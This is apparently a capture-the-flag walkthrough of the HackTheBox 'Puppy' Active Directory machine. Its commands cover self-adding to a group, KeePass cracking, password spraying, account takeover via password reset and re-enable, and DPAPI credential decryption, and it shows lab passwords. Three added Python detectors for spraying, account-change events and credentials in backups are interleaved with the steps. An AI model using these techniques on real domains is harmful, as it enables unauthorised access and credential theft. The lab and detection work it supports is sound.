This Windows Medium box starts with our user having write permissions over the DEVELOPERS group. Once we add ourselves to it and look at shares, we find the DEV share available to us. In this share lies a KeePass database, which we exfiltrate to our machine. We then crack the database password and discover users and credentials. After password spraying we have another valid user; this user is in the SENIOR DEVS group, with GenericAll over the user Adam.Silver. After resetting his password and re-enabling his account, we can finally get on the box. In the root directory we find a Backups directory with a zip file containing an XML file with credentials for Steph.Cooper. Using these credentials we log in, and BloodHound (or a look at the other users) shows a steph.cooper_adm account. With access to this user's AppData we exfiltrate the files required for DPAPI decryption. Once we decrypt the DPAPI credential blob, we find credentials for steph.cooper_adm.

Starts as an assumed breach with credentials: levi.james / KingofAkron2025!

Initial Nmap

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-08-19 23:17:01Z)
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3260/tcp open iscsi? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-08-19T23:18:50
|_ start_date: N/A
|_clock-skew: -55m40s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62785/tcp): CLEAN (Timeout)
| Check 2 (port 31083/tcp): CLEAN (Timeout)
| Check 3 (port 26380/udp): CLEAN (Timeout)
| Check 4 (port 63353/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

What are we doing as the KING

At first, I wanted to check what we have writable.

konoha# bloodyAD -v DEBUG -d puppy.htb -u levi.james -p 'KingofAkron2025!' --dc-ip 10.10.11.70 --host puppy.htb get writable
[+] Connection URL: ldap+ntlm-pw://puppy.htb\levi.james:KingofAkron2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
permission: WRITE

distinguishedName: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB
permission: WRITE

distinguishedName: CN=DEVELOPERS,DC=PUPPY,DC=HTB
permission: WRITE

This shows we have WRITE over the DEVELOPERS group object, so we can add ourselves to the group.

konoha# bloodyAD -v DEBUG -d puppy.htb -u levi.james -p 'KingofAkron2025!' --dc-ip 10.10.11.70 --host puppy.htb add groupMember 'Developers' 'levi.james'
[+] Connection URL: ldap+ntlm-pw://puppy.htb\levi.james:KingofAkron2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful
[+] levi.james added to Developers

Getting to know one another 😑

So I went ahead and collected a BloodHound dump for later use once we're further along.

konoha# rusthound -z -u levi.james@puppy.htb -p 'KingofAkron2025!' -f DC.puppy.htb -d puppy.htb -i 10.10.11.70

What were you hiding??

Before, we didn't have read access to the DEV share. Now, as a member of DEVELOPERS, we can see what lingers in it.

konoha# impacket-smbclient 'puppy.htb/levi.james:KingofAkron2025!@puppy.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use DEV
# ls
drw-rw-rw- 0 Sun Mar 23 02:07:57 2025 .
drw-rw-rw- 0 Sat Mar 8 10:52:57 2025 ..
-rw-rw-rw- 34394112 Sun Mar 23 02:09:12 2025 KeePassXC-2.7.9-Win64.msi
drw-rw-rw- 0 Sun Mar 9 15:16:16 2025 Projects
-rw-rw-rw- 2677 Tue Mar 11 21:25:46 2025 recovery.kdbx
# mget recovery.kdbx
[*] Downloading recovery.kdbx

A KeePass database. We could extract its hash with keepass2john and crack that, or do what I did and just use keepass4brute.sh.

konoha# ./keepass4brute.sh ~/Documents/htb/machines/TMP/recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344393 - Attempts per minute: 86 - Estimated time remaining: 16 weeks, 3 days
[+] Current attempt: liverpool

[*] Password found: liverpool

Show me your moves!!

Once in the database we have some users and some passwords we can sort through.

We can password spray with them, and once we do we get a hit.

konoha# nxc smb puppy.htb -u users.lst -p passwd.lst --continue-on-success
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
<SNIP>
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
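From the blue-team side, the spray above leaves a very recognisable trace on the DC: many 4625 logon failures for different accounts from one source address in a short window, often followed by a 4624 for the one account whose password matched. The following is an added example, not code from the write-up: a small detector that groups constructed Security-log events by source address and flags any source that fails against at least three distinct accounts within five minutes. The event tuples, the source addresses and the thresholds are all assumptions made up for the example.

```python
"""Detect a password spray from Windows Security logon events.

Added example, not part of the original write-up. The events below are
constructed to mirror the spray in the text: one password tried against
several accounts from one source, with a single success among them.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event id, target account, source address).
# 4625 = logon failure, 4624 = successful logon. Addresses are placeholders.
SAMPLE_EVENTS = [
    ("2025-08-19 23:20:00", 4625, "levi.james",   "10.10.14.5"),
    ("2025-08-19 23:20:01", 4625, "adam.silver",  "10.10.14.5"),
    ("2025-08-19 23:20:01", 4625, "steph.cooper", "10.10.14.5"),
    ("2025-08-19 23:20:02", 4624, "ant.edwards",  "10.10.14.5"),
    ("2025-08-19 23:20:03", 4625, "levi.james",   "10.10.14.5"),
    # Benign noise: one user mistyping their own password from a workstation.
    ("2025-08-19 23:25:10", 4625, "levi.james",   "10.10.11.42"),
    ("2025-08-19 23:25:40", 4625, "levi.james",   "10.10.11.42"),
]

WINDOW = timedelta(minutes=5)   # how long a spray burst may last
MIN_DISTINCT_USERS = 3          # distinct accounts failed against before we alert


def parse(events):
    """Turn the raw tuples into sorted (datetime, id, user, source) records."""
    return sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), eid, user.lower(), src)
        for ts, eid, user, src in events
    )


def detect_spray(events, window=WINDOW, min_users=MIN_DISTINCT_USERS):
    """Return one finding per source address that sprayed within the window.

    A finding records the accounts that failed and any account that logged
    on successfully from the same source inside the same window, which is
    the "spray followed by a hit" pattern seen above.
    """
    by_source = defaultdict(list)
    for ev in parse(events):
        by_source[ev[3]].append(ev)

    findings = []
    for src, evs in by_source.items():
        best = None
        for i, (t0, eid, _, _) in enumerate(evs):
            if eid != 4625:
                continue
            failed, succeeded = set(), set()
            for t, e, user, _ in evs[i:]:
                if t - t0 > window:
                    break
                (failed if e == 4625 else succeeded).add(user)
            if len(failed) >= min_users and (
                best is None or len(failed) > len(best["failed_accounts"])
            ):
                best = {
                    "source": src,
                    "start": t0,
                    "failed_accounts": sorted(failed),
                    "successful_accounts": sorted(succeeded),
                }
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in detect_spray(SAMPLE_EVENTS):
        print(f"{f['source']} sprayed {len(f['failed_accounts'])} accounts "
              f"from {f['start']}; successes: {f['successful_accounts']}")
```

The threshold on distinct accounts rather than on raw failure count is what separates a spray from a single user locking themselves out, which is why the workstation source in the sample data is not reported.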

Let's see what he has in BloodHound.

ant.edwards has GenericAll over adam.silver, so we can simply change his password and get on the box.

konoha# bloodyAD -v DEBUG -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc-ip 10.10.11.70 --host puppy.htb set password adam.silver 'SuperSecurePassword123!'
[+] Connection URL: ldap+ntlm-pw://puppy.htb\ant.edwards:Antman2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful
[+] Password changed successfully!

We can try to evil-winrm with his account, but we don't get connected; looking more closely at his account explains why.

konoha# bloodyAD -v DEBUG -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc-ip 10.10.11.70 --host puppy.htb get object adam.silver
[+] Connection URL: ldap+ntlm-pw://puppy.htb\ant.edwards:Antman2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful

distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
accountExpires: 9999-12-31 23:59:59.999999+00:00
<SNIP>
sAMAccountName: adam.silver
sAMAccountType: 805306368
sn: Silver
uSNChanged: 176441
uSNCreated: 12814
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD

We can see it's disabled, so we simply remove the ACCOUNTDISABLE flag and try again.

konoha# bloodyAD -v DEBUG -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc-ip 10.10.11.70 --host puppy.htb remove uac adam.silver -f ACCOUNTDISABLE
[+] Connection URL: ldap+ntlm-pw://puppy.htb\ant.edwards:Antman2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
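Every step taken with bloodyAD so far (adding ourselves to DEVELOPERS, resetting adam.silver's password, then clearing ACCOUNTDISABLE) is written to the DC's Security log as a directory-service change: 4728 for a member added to a global security group (4732 and 4756 are the local and universal variants), 4724 for an administrative password reset and 4722 for an account being enabled. The following is an added example, not part of the write-up, that runs two checks over constructed records of those events: a principal adding itself to a group, and a principal resetting a password and then enabling the same account shortly afterwards. The SIDs, timestamps and the helpdesk.svc account are placeholders invented for the sample data.

```python
"""Flag suspicious account-management chains in Windows Security events.

Added example, not part of the original write-up. Records are constructed
with the fields that matter from 4728 (group member added), 4724 (password
reset attempt) and 4722 (account enabled); SIDs are placeholders.
"""
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # levi.james adds his own account to DEVELOPERS (subject SID == member SID)
    {"time": "2025-08-19 23:30:00", "id": 4728, "subject": "levi.james",
     "subject_sid": "S-1-5-21-0-0-0-1101", "group": "DEVELOPERS",
     "member_sid": "S-1-5-21-0-0-0-1101"},
    # ant.edwards resets adam.silver's password, then enables the account
    {"time": "2025-08-19 23:41:00", "id": 4724, "subject": "ant.edwards",
     "subject_sid": "S-1-5-21-0-0-0-1103", "target": "adam.silver"},
    {"time": "2025-08-19 23:42:30", "id": 4722, "subject": "ant.edwards",
     "subject_sid": "S-1-5-21-0-0-0-1103", "target": "adam.silver"},
    # Benign: a (constructed) helpdesk account resets a password and nothing else
    {"time": "2025-08-19 23:50:00", "id": 4724, "subject": "helpdesk.svc",
     "subject_sid": "S-1-5-21-0-0-0-1200", "target": "levi.james"},
]

GROUP_ADD_EVENTS = {4728, 4732, 4756}   # global, local, universal security groups


def when(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def find_self_group_adds(events):
    """Group-membership events where the actor added their own account.

    Legitimate provisioning is done by an admin or a service account on
    behalf of someone else, so subject SID == member SID is worth a look.
    """
    return [
        e for e in events
        if e["id"] in GROUP_ADD_EVENTS and e["subject_sid"] == e["member_sid"]
    ]


def find_reset_then_enable(events, window=timedelta(minutes=10)):
    """Password reset (4724) followed by enable (4722) of the same target
    by the same actor within the window: the takeover pattern above."""
    resets = [e for e in events if e["id"] == 4724]
    enables = [e for e in events if e["id"] == 4722]
    findings = []
    for reset in resets:
        for enable in enables:
            same_target = enable["target"].lower() == reset["target"].lower()
            same_actor = enable["subject_sid"] == reset["subject_sid"]
            delta = when(enable) - when(reset)
            if same_target and same_actor and timedelta(0) <= delta <= window:
                findings.append({
                    "subject": reset["subject"],
                    "target": reset["target"],
                    "reset_at": reset["time"],
                    "enabled_at": enable["time"],
                })
    return findings


if __name__ == "__main__":
    for e in find_self_group_adds(SAMPLE_EVENTS):
        print(f"self-add: {e['subject']} -> {e['group']} at {e['time']}")
    for f in find_reset_then_enable(SAMPLE_EVENTS):
        print(f"reset+enable: {f['subject']} took over {f['target']} "
              f"({f['reset_at']} .. {f['enabled_at']})")
```

In a real pipeline the member in 4728 arrives as a distinguished name plus a SID, which is why the comparison above is on SIDs rather than on names like "Levi B. James" versus "levi.james".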

Silver Surfing

Once connected, we look at the root directory.

*Evil-WinRM* PS C:\> ls -fo


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 2/28/2025 12:31 PM $Recycle.Bin
d--h-- 5/12/2025 5:29 PM $WinREAgent
d----- 5/9/2025 10:48 AM Backups
d--hsl 2/19/2025 11:32 AM Documents and Settings
d----- 5/12/2025 5:21 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
<SNIP>

We see a Backups directory, and checking it out we find site-backup-2024-12-30.zip.

*Evil-WinRM* PS C:\Backups> ls


Directory: C:\Backups


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip

Once we download this and look at it, only one file looks interesting.

*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip

Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

Info: Download successful!

Backup Files suck dude!!!

Here we unpack the archive and check it out, which reveals credentials.

konoha# unzip site-backup-2024-12-30.zip puppy/nms-auth-config.xml.bak

In the backed-up XML file we find the LDAP bind credentials for steph.cooper.

konoha# cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
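A plaintext bind password in a .bak copy of a config file inside a site backup is a classic finding, and it is the kind of thing you want to catch before the backup is left on a readable share. The following is an added example, not code from the write-up: a scanner that opens a zip archive, picks out config-looking members and walks their XML for elements or attributes whose name suggests a credential, reporting masked values. The archive is built in memory with a copy of the layout seen above; the password inside it, the extra members and the tag patterns are constructed for the example.

```python
"""Scan a backup archive for config files carrying plaintext credentials.

Added example, not part of the original write-up. The archive is built in
memory to mirror the site backup above; the password value is a placeholder.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Element/attribute names that usually hold a secret (constructed list).
SECRET_NAMES = re.compile(r"(password|passwd|secret|token|api[-_]?key)", re.I)
# Archive members we bother parsing.
CONFIG_SUFFIXES = (".xml", ".xml.bak", ".config", ".bak")

SAMPLE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
  <server>
    <host>DC.PUPPY.HTB</host>
    <port>389</port>
    <base-dn>dc=PUPPY,dc=HTB</base-dn>
    <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
    <bind-password>PLACEHOLDER-NOT-THE-REAL-ONE</bind-password>
  </server>
</ldap-config>
"""


def build_sample_archive():
    """Constructed zip with one leaky config and two harmless members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("puppy/nms-auth-config.xml.bak", SAMPLE_XML)
        zf.writestr("puppy/index.html", b"<html><body>site</body></html>")
        zf.writestr("puppy/app.config",
                    b'<configuration><appSettings>'
                    b'<add key="Theme" value="dark"/>'
                    b'</appSettings></configuration>')
    return buf.getvalue()


def mask(value):
    """Keep the first two characters so the finding is recognisable, hide the rest."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def find_secrets_in_xml(data):
    """Yield (location, masked value) for secret-looking elements/attributes."""
    hits = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return hits            # not XML (or broken): skip, don't crash the scan
    for elem in root.iter():
        text = (elem.text or "").strip()
        if SECRET_NAMES.search(elem.tag) and text:
            hits.append((elem.tag, mask(text)))
        for attr, val in elem.attrib.items():
            if SECRET_NAMES.search(attr) and val.strip():
                hits.append((f"{elem.tag}@{attr}", mask(val.strip())))
    return hits


def scan_archive(zip_bytes):
    """Return one finding per secret-bearing element in config-like members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(CONFIG_SUFFIXES):
                continue
            for location, masked in find_secrets_in_xml(zf.read(name)):
                findings.append({"member": name, "element": location, "value": masked})
    return findings


if __name__ == "__main__":
    for f in scan_archive(build_sample_archive()):
        print(f"{f['member']}: <{f['element']}> = {f['value']}")
```

Running this over real backups before they are written to a share, and treating any hit as a credential to rotate, is the control that would have made the recovered bind password useless.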

Lets get intersteller coop!!

We can log in as steph.cooper and take a look around, but there's nothing we haven't already seen. So the next thing to check is DPAPI: the credential file and master key under this user's AppData.

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -h


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> attrib -H C8D69EBE9A43E9DEBF6B5FBD48B521B9
Not resetting system file - C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> attrib -S -H C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> download C8D69EBE9A43E9DEBF6B5FBD48B521B9

Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 to C8D69EBE9A43E9DEBF6B5FBD48B521B9

Info: Download successful!
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> cd ..
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> ls


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 3/8/2025 7:53 AM Credentials
d---s- 3/8/2025 7:40 AM Crypto
d----- 3/8/2025 7:40 AM Internet Explorer
d----- 3/8/2025 7:40 AM Network
d---s- 3/8/2025 7:40 AM Protect
d----- 5/8/2021 1:20 AM Spelling
d---s- 2/23/2025 2:35 PM SystemCertificates
d----- 2/23/2025 2:36 PM Vault
d----- 3/8/2025 7:52 AM Windows


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> cd windows
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\windows> ls


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\windows


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/8/2025 7:40 AM AccountPictures
d----- 5/8/2021 1:20 AM CloudStore
d-r--- 3/8/2025 7:40 AM Libraries
d----- 5/8/2021 1:20 AM Network Shortcuts
d----- 5/8/2021 1:20 AM Printer Shortcuts
d-r--- 3/8/2025 7:40 AM Recent
d-r--- 3/8/2025 7:40 AM SendTo
d----- 3/8/2025 7:52 AM ServerManager
d-r--- 3/8/2025 7:40 AM Start Menu
d----- 5/8/2021 1:20 AM Templates
d----- 3/8/2025 8:01 AM Themes


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\windows> cd ..
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> ls


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 3/8/2025 7:53 AM Credentials
d---s- 3/8/2025 7:40 AM Crypto
d----- 3/8/2025 7:40 AM Internet Explorer
d----- 3/8/2025 7:40 AM Network
d---s- 3/8/2025 7:40 AM Protect
d----- 5/8/2021 1:20 AM Spelling
d---s- 2/23/2025 2:35 PM SystemCertificates
d----- 2/23/2025 2:36 PM Vault
d----- 3/8/2025 7:52 AM Windows


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> cd Protect
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> ls


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> download S-1-5-21-1487982659-1829050783-2281216199-1107

Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107 to S-1-5-21-1487982659-1829050783-2281216199-1107

Info: Download successful!

Impacket this papi!

Now let's use impacket-dpapi: first decrypt the master key with steph.cooper's SID and password, then decrypt the credential blob with the recovered key and see what we have.

konoha# impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
konoha# impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

So It is how it is

Now we can evil-winrm in as steph.cooper_adm and grab the flag.

konoha# evil-winrm -i puppy.htb -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cd \Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/19/2025 4:10 PM 34 root.txt